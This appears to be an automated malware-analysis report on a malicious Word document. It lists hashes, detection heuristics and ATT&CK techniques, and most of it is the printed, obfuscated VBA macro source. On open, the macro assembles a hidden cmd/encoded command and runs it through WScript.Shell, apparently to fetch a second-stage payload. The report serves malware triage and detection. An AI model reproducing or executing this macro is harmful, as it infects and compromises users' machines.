Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 16ba76a9ae094d40…

MALICIOUS

Office (OLE)

77.9 KB First seen: 2019-08-04
MD5: 4dd919178d0dd428f6543e1701bbdb76 SHA-1: 06e65427d8cebddb043a8af9397731b81144fa55 SHA-256: 16ba76a9ae094d4094e0b1227f99d595ff514ccfe14c1e0b9f354e35d23032fd
310 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of Shell() calls within the VBA macros. Additionally, OLE_VBA_WSCRIPT and OLE_VBA_CREATEOBJ firings confirm the use of WScript.Shell and CreateObject, commonly used to execute arbitrary commands. The AutoOpen macro suggests immediate execution upon opening. The script attempts to construct commands using string concatenation, likely to download and execute a second-stage payload.

Heuristics 10

  • ClamAV: Doc.Malware.Generic-6668129-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6668129-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       Error 82430 / jZwzi / 82867 * iLwsqS
    SLVSFXt = CreateObject("WScript.Shell") _
    . _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Error 82430 / jZwzi / 82867 * iLwsqS
    SLVSFXt = CreateObject("WScript.Shell") _
    . _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "mpYijqLwRj"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10927 bytes
SHA-256: 0f3dc9bb43f05af224845bc7ebd02f22fbd68a1518174291edf3d94dfab678f7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
148 of 240 identifiers look randomly generated (e.g. 'dwcNZCjjdtaSa'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dwcNZCjjdtaSa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MjMiMjXLHS"
Function JUumPUlXL()
On Error Resume Next
Error UrrDWq * awfJb * EEWHY / azikIY
   Error rpthQc / YDVrr
RvTnUkpqw = "MD /V" + "^:O" + "n/C " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + "  ^S"
Error HSIvV * 27348
   Error wswzf * BQjiU / 48649 / RzdYaw
   Error Ozohi * HjidCI
wFlIwUcHf = "^et ^ ^" + "  ^" + " " + "^s" + "^5" + "7W=A^A" + "C^A^g^" + "A^A^IA"
Error 70425 * vpmwmM * wzmFU * wXisO
   Error KMJLp * BEcJLX / 25785 / DIsEO
ChVvMLAw = "^A" + "C" + "^" + "AgA^A" + "IA^AC" + "^A^g" + "^AAIA" + "AC^A" + "g^A^" + "AIA^A" + "C"
Error XnVzjh / 1836
   Error 38139 * kDzrt
   Error hHzsPq / 76287 * 98655 * zfoWqs
   Error cQzLr / IkMnq * plATMk * luJlO
   Error LfTQj / bGDLKW
AvdfVwn = "A^gAA^" + "IA" + "A" + "CA^g^" + "AQf^A0" + "HA7" + "B^AaAM" + "G" + "A0B" + "^QYAMG" + "A^9" + "BwO" + "^A^sG^A"
Error lkapN * 99200 * 45894 * ZpnDtW
GSPzOPKc = "^h^B^" + "QZ^A" + "I^HA^i" + "B^w^OA8" + "G^A^" + "m^Bgc^A" + "^QCA"
Error CPiRk / nHaOZS
   Error rAiLo * pBAni
   Error 55695 * RzadYj
   Error 71956 / 96558 / 38634 * FfEtzC
   Error 68818 / zzXAl
qslmPuilR = "^gA^Qb^" + "A^" + "UG" + "^A0" + "BQ^S" + "A0CA" + "l^B^w" + "^aA8" + "GA" + "^" + "2^BgbAk" + "E^"
Error iNSJG / azziS / XTmKVA / PpzSfh
   Error cjPoci / JzXstY
olNSo = "A7^AQ^" + "KA^" + "8^G" + "^AmB" + "gcAQC^A" + "^gAAL^" + "Ak" + "^F^AvB"
Error QBwiLR / dCZojf / ncjVwS / 67848
   Error 80646 / lJnnd
aDwvOGvzwq = "Q^SA" + "QC^A^" + "oAQ" + "^Z^A^wG" + "^A^pB^" + "gRAQGA"
Error CMCdk / hLzlmC
   Error 66094 * fRHsj / 64656 / lrDIW
   Error BdvAvz * jSrJrt * nVzGmi * fiDMwW
   Error iEjQK / IUDXL
lJDssGCIbk = "^h" + "B^wb^Aw" + "^G" + "AuBwdA" + "^8^GA^" + "EB^gLA^" + "I^GA^" + "0"
Error 11879 * 57988 * 68207 * OsIdK
   Error zsabY / BipPJ / ftCpd * DZPzT
   Error BGFTMO * VLSVdo
   Error YQQVwF / YzPWu * 85811 * wdhwIL
aOBwVU = "Bw" + "SAQC" + "A" + "^7^BQ" + "^" + "e^A"
JUumPUlXL = RvTnUkpqw + wFlIwUcHf + ChVvMLAw + AvdfVwn + GSPzOPKc + qslmPuilR + olNSo + aDwvOGvzwq + lJDssGCIbk + aOBwVU
   Error 95575 / DYJzE
   Error rMwUi / jjQoEU * DaoKt * wwwqFR
   Error vwQwO / 8269 / 20672 * DiZGN
   Error 28557 * zzbYw / 36593 * OVJum
End Function
Function JEnupYJwh()
On Error Resume Next
Error SjjiWv / SJYwW / kwFTmQ * WrDNla
   Error 10575 / dPQMl
SDbJZwBI = "^I^HA" + "^0" + "B^w^e^A" + "kC^" + "Av^BQT" + "^A" + "^oGAk" + "A^AI^" + "A4G"
Error wsUYb / iJzaUj
   Error oHPdp / aNGZB
nUCfhwz = "^ApB^A^" + "IA^kF^A" + "v" + "BQS" + "A" + "^" + "QC" + "^A^o^A" + "A^" + "aA^M^" + "GAh^B"
Error hsnNY / MMPCwu
   Error 62685 / swiUt
dhWIDUzD = "^Q^" + "Z^AIH" + "^A" + "v^B" + "^g^" + "Z" + "A^sD" + "^AnA^"
Error 94245 * vuuNdT / 40655 * bbmjoY
   Error wbJPq * 64109
PEuXmr = "QZ" + "^A^g^H" + "^A^l" + "^B" + "g^L^A" + "cCArA^A" + "R" + "^A" + "IGA^i^"
Error UTjGjK * CwGTq / 35533 / PYUhf
   Error 61376 * GLiijm * 91942 / Siwzj
   Error 70168 * EiPjV
WaFUHVW = "B" + "A" + "^JA^s" + "CA" + "n^A^" + "AXAcC" + "^A" + "rA^wYAk" + "^GAs^"
Error 101 * tJATYb * 10110 * dCWoS
   Error 44989 * 49130
   Error vdwDF / SDkXUW * Fwhzaf / ojVSC
   Error zrAkcF * SkiHzu / 24935 * UzmCIj
pGttoVFBWc = "BgY^A" + "^UH^" + "A" + "^wBg^OA" + "^Y^H^A" + "^uBQ^Z" + "A" + "^QC" + "A^9^Aw^" + "b"
Error pEvEq * 4759
   Error OCEFiB / bMIjB * 36624 / jKaXAz
LJYQHH = "^" + "AYG^" + "A" + "^y^B^A" + "J^As^"
Error sLslfo * 9114 / SVztw / BDKiRz
wiGDcBBh = "D^AnAQN" + "^AA^" + "DAx^" + "Aw^J" + "^AAC^" + "A9AA" + "^I^A" + "QE^Ai^B" + "g^Y^A^" + "QC^A" + "7^AQ^K" + "A" + "cC^A^A^"
Error cONAKd / 21190
qzCVKFChqA = "Bw^J" + "^A^gCA" + "^0BQa^A" + "^" + "wGAw" + "B^w^U" + "A^4C" + "An^A^Qb" + "^A^M^" + "H^" + "Ak^Bg^Y" + "^A^gE" + "^A"
Error 37594 / OtSSQW
   Error asEVVF * 65744 * 53441 * HqGtA
   Error 550 / 24451
TtKjFOW = "v^" + "AwcA^Q^" + "G" + "^A" + "hB" + "^wbA^w^" + "GAw" + "B" + "Q^" + "d" + "^" + "A^8CA^" + "0^B"
Error XKVli * 51672
   Error oHVlsm / LdSiv / wrRLHW * QcfhRl
JLnltD = "^g" + "^b" + "AUG^A" + "^0" + "^Bg" + "^" + "bA^8G" + "^"
Error HSnoT * 92825 / 87131 / AjQKi
   Error 33742 / jFSsQw * 43871 * WFGpow
   Error 12772 * OEzhXN / BnwbAE * wtiLb
kSROHDFCF = "AjBQ^L^" + "AA" + "H" + "A3BwLAU" + "^G^A0B^" + "QaA" + "MHA" + "i^BQ^" + "ZAc" + "HA" + "vA^Q" + "^bA8G^" + "Aj^"
JEnupYJwh = SDbJZwBI + nUCfhwz + dhWIDUzD + PEuXmr + WaFUHVW + pGttoVFBWc + LJYQHH + wiGDcBBh + qzCVKFChqA + TtKjFOW + JLnltD + kSROHDFCF
   Error omPKqZ / iwvGJ * CJvtSN * 79847
   Error MGmJs * 8670
End Function
Function ObASoj()
On Error Resume Next
Error fkKsBz / 80200
   Error zqPaq * rPiotz
   Error bRsSm * nqABwc / 22641 * 13179
jzPJksJW = "B^" + "gL^A" + "^Q^D^Av" + "^Bgc^" + "A^A" + "^HAl^B" + "gc^A8C" + "^Av^Ag^" + "O^" + "AA^H^" + "A^0BAd" + "^A"
Error 98525 / FGHwa / 94673 / KliEtj
qLRizBfD = "g^" + "G^AA" + "^BA" + "^W^" + "A^M" + "DAvA^Q" + "bA^8GAj" + "^"
Error Liwri / jABFo / WzjjK / czuJl
   Error 92423 / tNUWUD / DizFm * zXnoSa
   Error 53929 * HopXP / 19403 * FMdSqi
QJSlJt = "B" + "^gL" + "A^w^G^" + "A^pB^wc" + "A^" + "EG" + "Ay^B^" + "g" + "^Y^" + "A8G^Ak"
Error cwIZG / GBzGv
NhNvnC = "^B^gY^" + "A^IH^" + "Ah^BQb^" + "A^8CAvA" + "g" + "^O^A^" + "A^H^A^" + "0BAd^" + "A" + "^g^" + "GA^A^Bg" + "c^" + "A^s^G"
Error 40740 / wAUHoT * Qzsszw / 24296
   Error 92730 / zwqsTB / JhoFk * qWkBbv
   Error frBYsl / QpoIX
   Error 74862 / hfKazL / 70545 * ostuAc
   Error jiklw * PmaXX / bGVSPt / lkXNvz
tihwjXP = "^Ar^" + "B^" + "QOAYHA" + "^2^BAb" + "^A^kDAv" + "A"
Error WwjZq * obZoEv
   Error AtdRXI / NOzuLu / 10707 * iOLWK
   Error 90433 * WRVAU / QNfzqJ / wTRbhS
   Error 59639 * AEoKa
   Error LjJBSs * rjirFZ
   Error 60973 * dkaKLh * wBBpW * QzDOZP
hCnlbWjFqz = "gc^" + "A" + "^Y^G" + "^A^u^" + "Awc^A^" + "E^" + "GAr^B^" + "Qd^A^w" + "G^AuA^Q" + "^MA"
Error jhVVcN / wJbXbd
   Error QlGcr * snYbln / 9036 * KELtYz
   Error dOjVXz / MrTFtk
   Error ViCWU * zcPhUF * PWsLq * WRDcq
   Error MqHYBY / WVfEa * JPdRk * iisdq
TwQIwWqw = "A" + "^H" + "A3^Bw" + "LA^8C" + "A^6^" + "A^AcAQH" + "A0" + "^BA" + "aA" + "AEA"
Error 39013 / CUMQd
mQfUavVbEI = "2A^wc" + "A8C^A" + "t^B^wb" + "A^M^G" + "^AuA^" + "Q" + "YA^kH^A" + "^h^Bg" + "^Y" + "AE^G^" + "AyBQ" + "^dA" + "^M^H^"
Error 54931 / wKGbo * hIMLAL * jnXYjS
vlYHwQij = "A" + "w^B^w^b" + "AQ^H^A" + "h^B" + "gcAE^GA" + "^j" + "B^QYA" + "c^"
Error cJuhbz / EQnZt
   Error LiiavU / 7706 / 53887 * MtYMf
zTORLz = "G^A^u^" + "B^QZ^A" + "^A" + "^" + "H^" + "Au" + "^A^g^" + "bA" + "E^G^A" + "p^BQ^Y^"
ObASoj = jzPJksJW + qLRizBfD + QJSlJt + NhNvnC + tihwjXP + hCnlbWjFqz + TwQIwWqw + mQfUavVbEI + vlYHwQij + zTORLz
   Error 15156 / HOKdJI
   Error 71735 * IQzctO / NEkmnR * UHKdG
   Error WGbTQ / jkBNLh
   Error KjnCSS * bLcSdJ / SQFpRt / 26046
End Function
Function nAzzLrMfvdG()
On Error Resume Next
Error QDdqG * dcuvwA
   Error 96827 * Yaabsz
   Error vSlIVP / 68620
   Error zLliH / kbLRmZ
   Error ToEusH * Sfrct / 63967 / ZwzoQS
qMMwjAdXHI = "AI^" + "H^A^" + "l^B^" + "w^Y" + "^AI^H" + "^A" + "^l^B^A"
Error vlUud * IKtOi * 21886 / VaSKt
HjDQGQfG = "c" + "AE^G^A" + "^yB" + "Q" + "^YA^" + "M^"
Error INzJhD * KGHiYw
jvQUAZSu = "G^AhB^w" + "Z^A4^" + "G^A^" + "lB^Ac" + "^A8C^" + "Av^Ag" + "OAA^" + "HA" + "^"
Error kwbfF / InXUl * PcAnGA / MRXWnl
   Error 92141 * 45743 * 14904 * oArPdf
BFNOsJdr = "0B^A" + "^d" + "^A^gGA" + "A^B^wRA" + "A^F^" + "AiB^w" + "c^A"
Error 61237 / mMiMAE
   Error 85673 / zWiGz / 92485 * icYOn
pYPaqEzU = "s^G^A^" + "G^B" + "^Q^b" + "A^I^H" + "Av^AQ" + "Z" + "A^sG^Au" + "^A" + "w^b^AM" + "^G" + "Au^A" + "wcA^Q"
Error 48037 / rwAZf
   Error OoMbou * 90063 / QWZwG / SjoIib
   Error 84677 / 24502 / 78626 * msJjjq
   Error 57885 / XuGcj * 46891 / jLviC
mRnjIWh = "^H^A^uB" + "^QdA" + "8G^" + "A" + "t^B" + "^g^Y" + "AU" + "^G^" + "A^3B^" + "wLA8C" + "A6AAc^A"
nAzzLrMfvdG = qMMwjAdXHI + HjDQGQfG + jvQUAZSu + BFNOsJdr + pYPaqEzU + mRnjIWh
   Error FRwzQB * lTUAS * 19075 * 62052
   Error UfnUPR / JkGUv
End Function
Function LCPiiwCsXW()
On Error Resume Next
Error 22223 / 55168 * jGihF / nhjMT
   Error RDWODC / OpzlV
   Error 94097 * rsaQC
   Error 74461 / 66531
GFsFajN = "Q^HA0" + "B" + "^Aa^Ac" + "CA^" + "9" + "A^w" + "bA0E" + "A^q^BA" + "^J^AsD" + "A" + "0B^g^"
Error 70280 * Poirj * RiHsvF / 17149
   Error 35307 * zfodw / JfqQt / bUsAnz
   Error ibBUQz * YOaZm
   Error AFOwW / 53973 * 73179 / TOKwi
MkSwaJAG = "b^A^UG^" + "ApBA^b^" + "AM^E^" + "A^iBQZ^" + "AcF^" + "Au^A^A" + "^dAU^G" + "^A^" + "O^BAIAQ" + "HA^" + "j" + "BQ^Z^A^" + "oGA"
Error HFirlw * KIkGw
   Error IOozu / FfHSHw
   Error iNmdb * dZzjB * nwZUHS * 94150
   Error SBzWr / GthsFo / Sfjid / oWHDl
YatkbnMcwGj = "^i^B^" + "wb" + "A" + "0CA3" + "^BQ" + "ZA^"
Error OhiXrE * zOirLM / iYHLI / MzrlEj
   Error 55156 / Yqmzb * 5952 * bFdatv
iqDwwc = "4^G" + "^A^9A" + "^" + "g^Y" + "A^Q^H^A" + "L^BA" + "^J^ ^e-"
Error tkKqtY / ksSCW / Thnbl / ptSHr
   Error 32502 * MjzUt
   Error zWHNrf / zObws
RufGROVWZE = " ^l^l^" + "eh^sr^" + "ewo^p& " + "f^" + "oR " + " /^L %" + "^G ^"
Error 50634 * SCMasd * aXDHEG / iRoMsF
   Error AMRKXL / iwWjiZ
   Error RVArKr / 16933
zVzvBSwQj = "IN " + "(^ ^" + " ^ " + " ^10" + "^61" + ",^  ^ ^" + "-1^" + " ^ ^" + "  ^"
Error 66770 * mTEsYH / 76681 / qNoUm
   Error 32946 / wfqHAj
   Error 71267 * 82851 / BSmRW / qQIJr
sSzKLYcPj = ",^ 0 ^" + "  ^ )" + "d^O " + "  " + "^sE" + "^t   " + "  ^t^Kz" + "=!" + "^t^Kz!!"
Error QzwHCk * znrnZ / jPiaM / NzwQlt
   Error UXzuzR * SDDrK / cTLtFQ * iFwZQJ
huNcjHHpdDr = "^s^5" + "7W:" + "~    %" + "^G,   1" + "!&&  ^" + "i^F  " + "%^G  " + "  L^" + "E^Q  "
Error 42215 / CRqIw / NzDjAi / hKOqp
   Error aZinD / BFHjHv
azMal = "^" + "0 ca^l^" + "L  %" + "^t^Kz" + ":~^ ^ ^" + "-^1" + "^06" + "2%     " + " " + "  " + Chr(1 + 0 + 4 + 0 + 29) + "   "
LCPiiwCsXW = GFsFajN + MkSwaJAG + YatkbnMcwGj + iqDwwc + RufGROVWZE + zVzvBSwQj + sSzKLYcPj + huNcjHHpdDr + azMal
   Error 71595 * 57924
   Error aaHCC * 65385
   Error 95241 * CvTqLm * 88853 / JmntTi
   Error NAWlh / brEiE / 52961 / OTCDv
   Error VRFFzK / 78098 * TXRjm * 15562
End Function


Attribute VB_Name = "mpYijqLwRj"
Sub AutoOpen()
On Error Resume Next
   Error 50877 * 69896
   Error 80640 * 76323
   Error 82430 / jZwzi / 82867 * iLwsqS
SLVSFXt = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(1 + 0 + 2 + 8 + 56) + IfVBtJOR + MHozuTHI + JUumPUlXL + JEnupYJwh + ObASoj + nAzzLrMfvdG + LCPiiwCsXW + jIhVLDHFYtGT + ifNXDpTZVVw, 711730862 - 711730862)
   Error BItcCs * JRPFk * 8988 / NKnLXW
   Error 85878 / 36976
   Error 33721 * 64194 / LaCWB * hOhOnK
   Error qYWif * Qczzz
End Sub